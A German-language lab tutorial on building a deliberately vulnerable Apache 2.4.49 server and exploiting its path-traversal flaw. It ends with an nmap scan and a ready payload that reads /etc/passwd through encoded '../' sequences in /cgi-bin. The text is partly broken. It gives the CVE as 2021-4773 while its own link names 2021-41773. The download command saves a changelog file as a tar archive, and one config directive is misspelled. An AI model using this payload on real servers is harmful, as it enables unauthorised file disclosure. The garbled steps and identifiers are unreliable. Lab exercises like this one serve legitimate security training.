
dies ist ein Praxisbeispiel, wie man die Schwachstelle CVE-2021-4773 mit einer virtuellen Maschine ausnutzt.
Dies ist ein Praxisbeispiel, wie die Schwachstelle CVE-2021-4773 mit einer virtuellen Maschine ausgenutzt werden kann.
Für dieses Tutorial benötigst du Folgendes:
Also los geht's. Wenn du zwei virtuelle Maschinen laufen hast, installierst du Apache Version 2.4.49 aus einem Archiv-Repository. Du findest diese Version hier: https://archive.apache.org/dist/httpd/CHANGES_2.4.49
1 Als Erstes musst du auf deiner virtuellen Server-Maschine den folgenden Befehl ausführen:
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 oder wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2
2 Als Zweites musst du diese Version von Apache wie folgt entpacken:
tar -xvjf httpd-2.4.49.tar.bz2
3 Installiere das folgende Paket:
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev
4 Führe die ausführbare Datei im Hauptverzeichnis (Dateiname configure) aus und verwende das Flag, um das Installationsverzeichnis anzugeben:
./configure --prefix=/usr/local/apache2
5 Kompiliere die anfällige Version:
make
6 Installiere die anfällige Version:
make install
7 Überprüfe die Version:
ls /usr/local/apache2
8 Starte den Prozess:
/usr/local/apache2/bin/apachectl start
9 Überprüfe den Prozess:
ps aux | grep httpd
10 Konfiguriere die Schwachstelle: Finde die Datei /usr/local/apache2/conf/httpd.conf und konfiguriere das Verzeichnis admin. Finde den Tag directory und ändere Require all denied zu
Required all granted
Finde den Tag Files .ht* Required all denied zu
Required all granted
Die erste Änderung dient der Ausnutzung der Schwachstelle in der lokalen Umgebung, die zweite der Offenlegung in der realen Umgebung.
1 Scanne die IP-Adresse mit nmap mit dem folgenden Befehl:
nmap -sV ip_address
2 Führe einen curl oder wget durch, um den Apache-Server zu testen:
curl ip_address oder wget ip_address
3 Überprüfe, wie die Schwachstelle auf der folgenden Seite ausgenutzt wird, wenn du die Syntax verstehen möchtest:
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability
Oder verwende einfach das folgende Payload:
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd